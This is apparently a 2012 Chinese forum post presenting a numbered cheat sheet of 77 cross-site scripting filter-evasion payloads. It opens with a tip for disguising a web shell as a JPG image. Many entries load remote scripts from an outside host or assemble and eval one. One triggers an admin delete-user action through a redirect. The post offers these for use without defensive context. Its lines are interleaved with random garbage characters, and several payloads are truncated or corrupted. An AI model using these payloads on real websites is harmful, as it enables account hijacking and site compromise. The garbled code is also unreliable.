跨站图片shell
6 t% ~, r& m4 _) ]2 kXSS跨站代码 <script>alert("")</script>
+ f% k6 b! a$ f/ }, o5 w. d& }
% ^* v& ^' _) Z; M* ^5 j将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马9 W% u* z. Z8 J+ y6 y# `
8 ]" r5 A( r3 [( H8 E0 O. @; o1 {! X9 p9 G# ]& `
/ b) i! A1 b( ^. r# o$ r p
1)普通的XSS JavaScript注入
8 g5 X, e7 s' c& C! n5 J<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* D$ F2 {2 K# ]! K' z3 c
( p( q, h" S/ K0 U(2)IMG标签XSS使用JavaScript命令( G& F3 J: `3 X; H; h
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% p7 i' ?; U* b/ o& N9 z; ~
, ]7 d" s) j- S, E(3)IMG标签无分号无引号
6 _7 r8 \/ J7 B' h& D* R: ~# l& u8 ~<IMG SRC=javascript:alert(‘XSS’)>
1 V# C3 H& n) C2 I0 @5 G8 |8 G9 J% T3 i3 [7 Z9 a9 l: l" r
(4)IMG标签大小写不敏感
2 {& P) ]: [5 r1 F<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ z4 r) I/ I3 P) ?. b5 C3 f8 ~% @& K( c( Q( X7 [
(5)HTML编码(必须有分号), W3 D* B/ Q. N/ R
<IMG SRC=javascript:alert(“XSS”)>
" Q: [0 R6 g. C7 W, H& o
4 Z t6 S: @1 ^(6)修正缺陷IMG标签4 \" C0 ]7 E3 L$ D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ c( D: \1 v' L; Q
1 R3 e, @2 m* ^" E# y# C/ J(7)formCharCode标签(计算器)) ~2 l; W4 A: q; K
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9 B1 r# t( D$ M9 Y0 O0 j/ y0 e* p0 k
(8)UTF-8的Unicode编码(计算器)
# @- U: n; I" F- N<IMG SRC=jav..省略..S')>
- J6 h3 b. E! l" T& Q! v- m: b0 v0 r6 m
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)( |) u* ?1 R4 w$ Z
<IMG SRC=jav..省略..S')>6 x. N2 W' d* |& o
- j. ]! T7 K9 k
(10)十六进制编码也是没有分号(计算器)
0 c& \1 ?" x9 P<IMG SRC=java..省略..XSS')>6 C0 i# V3 C( `3 S7 d
/ v4 _1 r! `) R1 K4 a$ }/ b/ C6 S! x
(11)嵌入式标签,将Javascript分开
W2 W, n* x% X3 U! `# Y<IMG SRC=”jav ascript:alert(‘XSS’);”>: i1 E0 R" C) J3 l7 ~1 N- H% J
1 J* N4 f! x3 D0 a2 S3 R8 ](12)嵌入式编码标签,将Javascript分开. G( v2 P& [! B
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 r. F: @8 B5 T0 t9 }
) _; S7 `$ {6 T. a* ?
(13)嵌入式换行符
5 D1 ?) W& @% n8 Z, W, z<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ s3 _, L2 }) v- z* F0 a) ?5 e9 p$ ?. _7 I0 [+ R+ |* A
(14)嵌入式回车6 B) R+ n. g/ [2 }$ l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( G) F1 e9 o6 E; H+ \- t( f& ~( ?" s4 J. K
(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 i4 s2 f4 |- B* s. J: v# e+ S
<IMG SRC=”javascript:alert(‘XSS‘)”>* v8 ^" B, l0 o$ ]* F ?& q- l
6 V$ z! L! K4 ]/ T, s' D(16)解决限制字符(要求同页面)4 s- ^- k1 o; i' S% h
<script>z=’document.’</script>
" ^$ L7 g: j# @, }: k2 f8 R6 H<script>z=z+’write(“‘</script>! r7 m2 G' p; W/ |! i+ \* C
<script>z=z+’<script’</script>. M- w' V( J* f
<script>z=z+’ src=ht’</script>
1 v/ t: G' h3 y$ u8 k: Y+ U6 y<script>z=z+’tp://ww’</script>
4 S; S( c# _% O) M( i* ^<script>z=z+’w.shell’</script>
: B6 y4 ^. ]' v& J8 K2 ?* w6 ^<script>z=z+’.net/1.’</script>1 Q, a( X. \+ S/ D) c* g5 J
<script>z=z+’js></sc’</script>
" w+ M- G8 p8 x5 f& Y9 L) F0 X1 ]<script>z=z+’ript>”)’</script>0 Y- J7 O/ c: x9 E
<script>eval_r(z)</script>
0 _7 Y2 r! G5 q" c& P2 z0 G9 e+ }2 t1 t) Q7 L9 Q
(17)空字符
5 [4 k% H+ a- M$ E/ ^perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
( H9 | A+ q, {- O" a
# M+ l( S- {" f/ D |: R B(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 @: r8 l2 {3 z/ J$ Aperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) Z i7 \- Z; ]
+ u5 w+ a6 U' G q% ?, _, C(19)Spaces和meta前的IMG标签
! r3 ?, I# U' Y1 b! q<IMG SRC=” javascript:alert(‘XSS’);”>
$ c! I. A) o, s' f/ `
2 p4 e# I- V# H+ x$ c. `+ O(20)Non-alpha-non-digit XSS
8 n) I' ~& _1 X9 U3 w* b<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 J. _. A$ o; u- s# E- k7 j$ ~0 X8 r- x, t$ A( l: f
(21)Non-alpha-non-digit XSS to 25 ~8 _2 h g W, ]$ Q% A
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>6 U1 L. P& A/ z6 g
' Y9 `- Q8 \; r5 Z# [4 s% P' X, e; \
(22)Non-alpha-non-digit XSS to 3/ m8 E1 ?6 `: x7 {
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 I: M, a+ _4 L% d8 G( `) m
9 I- R7 O( r& {! l/ Z" H
(23)双开括号
) f$ W3 y4 o. b" T/ R<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! ~, P. @' R% ?/ A9 F
5 n f. f( Q4 `6 m5 s" |, G& G(24)无结束脚本标记(仅火狐等浏览器)
* ~- y9 v+ |6 |* T# T<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ o: o" M5 M! ~# ?. l
6 L( f3 c2 V) ], X4 J' L( c(25)无结束脚本标记2
, e2 b/ v( {7 [% B" r- O( h<SCRIPT SRC=//3w.org/XSS/xss.js>
- G- H9 b. L1 _ B' K8 c) V5 R; d* E
3 N8 f- q! }5 p(26)半开的HTML/JavaScript XSS1 P# w7 D* Q0 _) w/ ]3 b* g" {
<IMG SRC=”javascript:alert(‘XSS’)”" ]7 p$ K+ V6 ]
$ D, n, \. P1 U4 n( g(27)双开角括号( B! C$ M- ~5 y( O3 B
<iframe src=http://3w.org/XSS.html </ m" O# K7 g6 M& i& C% B: R
' e1 m! ?6 [$ S1 l(28)无单引号 双引号 分号8 \+ u! R+ K' T) J* M) Q
<SCRIPT>a=/XSS/* m: _' Y" C0 |/ x
alert(a.source)</SCRIPT>
2 J5 G9 t' _2 E/ Q
$ b: _, O* J2 w1 E/ U(29)换码过滤的JavaScript
$ w* V' i7 {4 |# G( a! [- h' _% y' a\”;alert(‘XSS’);//
, L! f% R, D* W' M4 c6 b6 G2 n, L4 S0 _) K2 c
$ a4 }4 ?6 q' D: [# Z7 P(30)结束Title标签" p" Y- w% J; t; y' Y4 y- k
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' e; r' }9 Q, P5 E5 h& M1 I
9 z( Z8 p# h# U% N6 E3 B(31)Input Image
# U# x1 a% H& J3 i: T) B; j<INPUT SRC=”javascript:alert(‘XSS’);”>
# g+ _) y/ ]/ o& U5 V& [6 o2 _7 B5 v) Y0 D
(32)BODY Image
- U/ G* |8 d5 L' l- w# [<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 u0 m5 \1 N; Y8 z1 J3 q D
2 N7 a4 @6 p( c/ P(33)BODY标签
. m {" t: o! [) W' h1 N Z<BODY(‘XSS’)>
; Y! `7 h" N; P/ l9 u
& m) M& L# J9 }& j/ u$ W(34)IMG Dynsrc
c5 i! D5 j) M' K; l5 x<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ l& Y9 Q% I3 p' N- f0 w& N+ b8 w
(35)IMG Lowsrc9 G6 S/ p3 x) A7 x: i
<IMG LOWSRC=”javascript:alert(‘XSS’)”>5 U C% F' y- U* K
0 f1 g. Q- ?# F6 D4 C+ d% S' i5 J
(36)BGSOUND
3 `, y' M( q0 N1 }5 [2 K7 E<BGSOUND SRC=”javascript:alert(‘XSS’);”>
/ j( `7 J) {$ M% e7 U: O N1 R5 Q' i' B+ ]1 q8 ^9 ?
(37)STYLE sheet
( m( g5 r$ m" l# E( X9 }<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
! t8 w/ m. F2 a- a& R
! g, F) s: _4 C( T" w1 Q) K(38)远程样式表1 I, B1 s$ y; e
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) E8 p' Z/ M5 @/ e4 A' l; K
& U! }+ J! q" ~. W(39)List-style-image(列表式)
: d0 j2 x. o$ F; Y' O O& r<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" E/ L5 n3 Q; `; G( y. c7 E+ o& `
(40)IMG VBscript# r l- K( l8 k2 K( D
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
0 `: E; u7 p, Y. F: q# J8 z1 n, R% O
(41)META链接url
5 c: S, n) x9 Z<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>, D# s2 n" r4 e; @6 W# O' P" n! T
" L( o6 L$ y# ~5 X: f5 {$ F2 u(42)Iframe
. q. w9 V7 m7 X( m b7 U6 c. s<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>7 L, C6 x* f+ a
(43)Frame5 M# P$ c1 f' I; ^" x
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
3 ~5 f- I6 S$ {# J; L/ x6 [2 U; C2 ?" J1 s* E; N: t; _ r
(44)Table
) P3 B1 _: j. \<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 Q% n1 e) q/ ]. q% w$ d2 b/ @0 ^
2 D+ k$ M& q2 F' S$ U2 ^(45)TD! G' ~$ F1 \( f+ k( z
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>6 K. k& s- t t, _7 b8 Z( W7 ]
: T. S- @9 e; E& m4 `! d(46)DIV background-image
" R+ c4 W' F, V- Y, R) a8 }<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
) u% Y4 A/ L4 |* W3 H, Q* ?3 v% A
% R) M ]; X9 k: m7 ?(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 Y% d2 y3 n# Z/ b' P1 W/ z% }' q
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>8 [# e, M4 V0 h, }
4 O4 I5 N) p2 `$ ^! \(48)DIV expression1 u, T5 W7 D" ~2 [, z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”> u: Y9 ^/ ^, d0 z
5 C- ^' f8 O8 y
(49)STYLE属性分拆表达3 H% v j& z, e% y, ]
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ J J$ X+ \3 N( ^# ]' X
& F* r; r1 T' K& J. w0 K(50)匿名STYLE(组成:开角号和一个字母开头)
9 ?" n4 G ]' z' u- I1 P<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- ]1 S4 r! {6 H/ A* }9 g( s y$ o; @6 y1 N- j) `" b
(51)STYLE background-image
9 Y$ B. Q4 {: q: r% y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
$ f7 s/ `$ m1 }3 g# W3 n' r7 s1 l( r
; i7 P! u% G( S8 d ^(52)IMG STYLE方式9 j3 g, p' @) d& c
exppression(alert(“XSS”))’>; F( R1 }0 t% H, G
; I( X$ S- m" D0 L+ J
(53)STYLE background
- ?. Q8 B6 ?3 K* m) j- p<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
j9 c' e% a0 Q# e
" X7 W9 U, c9 h, ]9 x4 x(54)BASE5 \6 a. {6 k$ V
<BASE HREF=”javascript:alert(‘XSS’);//”>+ J( s, W- G* [( j
7 |, R1 g" Q1 B/ h
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
* @6 V4 \& V- f3 R6 ?<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
/ A; x7 [* G0 x" p8 Y0 j
1 n3 c! K; O( V# Q o, p$ W0 W$ o(56)在flash中使用ActionScrpt可以混进你XSS的代码
6 j: K- s! y, h3 g; [& ?1 ea=”get”;/ m. u ^2 V0 R! E/ l& E3 ^$ |
b=”URL(\”"; ?' j! j9 e( Q5 ?5 B; }6 H
c=”javascript:”;7 e' f7 V" x/ G u
d=”alert(‘XSS’);\”)”;
3 E2 i( w+ E* neval_r(a+b+c+d);
# u0 p' ^/ h$ p y# n1 i" W' q+ i( m8 ~; Q- ?
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
E( X# Z4 c. L: Y4 a& I<HTML xmlns:xss>
: w7 Y9 A9 F4 C4 Q+ d! ]6 z; W<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> u4 q1 s2 g, m# g0 H2 g
<xss:xss>XSS</xss:xss>1 e" C, l1 _5 D! X) [ z
</HTML>
8 i( |* d7 a4 k3 k( P) [+ V: f I# p; o
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用: f0 n; m/ m1 e/ H3 _8 q8 o
<SCRIPT SRC=””></SCRIPT>8 A% w- S- ^# X4 s/ ~- z! a) R
' E) a! W, U3 C7 D$ [; O(59)IMG嵌入式命令,可执行任意命令8 ]; L& j+ f+ q! u
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
) x9 X; d; T R7 A2 b
0 ~. n3 c# w; u5 D% y(60)IMG嵌入式命令(a.jpg在同服务器)( I' N% v J c7 n1 G
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
* j D0 a! y& c# V+ {; i0 S; I* ?' |. V' S1 K' I
(61)绕符号过滤
0 i! v8 @+ s( a R<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* T& K$ G# G- @5 e+ m
# N. b4 W7 P5 t5 l' ](62)9 t O- S5 Z5 W4 k( ?
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' S" Z8 ]" h2 l. B) L7 q
* s: L- C) L; `8 P(63)
9 \3 e2 P8 J6 V<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
( S& {4 f1 x( b C6 E7 U& X" R8 T6 h% y
(64)3 j. b* A" ~* c9 R
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>4 T n6 w- r% i. q- u( {* K) n
; Q$ z! r0 Y7 T: b5 y
(65)3 L7 J1 r* A7 e, J" U" o% |
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
* [; z1 Q+ ?( L: A: ~+ o
i, s6 s! F4 A- n(66)
% w0 |( D- Y) V4 Z/ R<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 e7 r+ Y# Z4 @
5 C! r, w' U' D, ~; r7 |8 C(67). h f4 f4 @8 |
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
; p& k( a; U* |9 P/ |
8 z t @0 x: Y8 O9 m9 o(68)URL绕行
0 ^, w, \- i2 u( Y: A4 m<A HREF=”http://127.0.0.1/”>XSS</A>4 D( N) g/ ~* y; K! P
9 O( D' t6 D( S- C5 h/ b2 c8 D(69)URL编码, i0 u9 I$ c$ i* H; x7 K
<A HREF=”http://3w.org”>XSS</A>: v3 D; d o7 P+ t# x
6 ~; u' U% e9 Y6 ?(70)IP十进制
) J! x: f$ P, g$ a5 N+ M<A HREF=”http://3232235521″>XSS</A>
4 j, m6 d6 V! ~$ K
1 D: ^& f3 r4 R$ `2 r3 {7 ^, n(71)IP十六进制6 T& n2 f7 h' o! D
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
9 `3 X; @* `7 X' D3 _3 G1 `! P: Y( {' y k9 q" Q/ Y
(72)IP八进制
Y/ b% T( n0 Z( J<A HREF=”http://0300.0250.0000.0001″>XSS</A>
5 V- U2 [: X0 f: \
$ ~5 w/ q/ V4 n* J; S; \(73)混合编码: t# Z9 J. Z$ \# O; ~( _& q7 M% w
<A HREF=”h3 Z% l$ Z) f5 {/ J" W3 \6 q9 r% ~
tt p://6 6.000146.0×7.147/”">XSS</A>7 P6 L5 f7 O; l, S
+ h) N3 S9 ?0 ?' A8 H
(74)节省[http:]( O! v7 G Q9 h! W
<A HREF=”//www.google.com/”>XSS</A>
, \+ Y$ m* }# U0 H( m$ z# K0 n- B' N3 G7 C
(75)节省[www]
' I- A ?7 s; u& T y! l: B% M<A HREF=”http://google.com/”>XSS</A>
1 j6 a: _) B/ m, i. l K1 l1 t* {/ L m
(76)绝对点绝对DNS: _: o" U" M0 N3 n
<A HREF=”http://www.google.com./”>XSS</A>
! f6 X) h/ x3 o$ Q3 O/ y5 p' ?2 j5 s2 L* a! l: Q }
(77)javascript链接1 \& J$ M2 g; N3 S1 Z7 Y* R/ l
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>! o2 j. t" F# Z" n( A: `
|
发表于 2012-9-13 17:04:56
收藏
支持
反对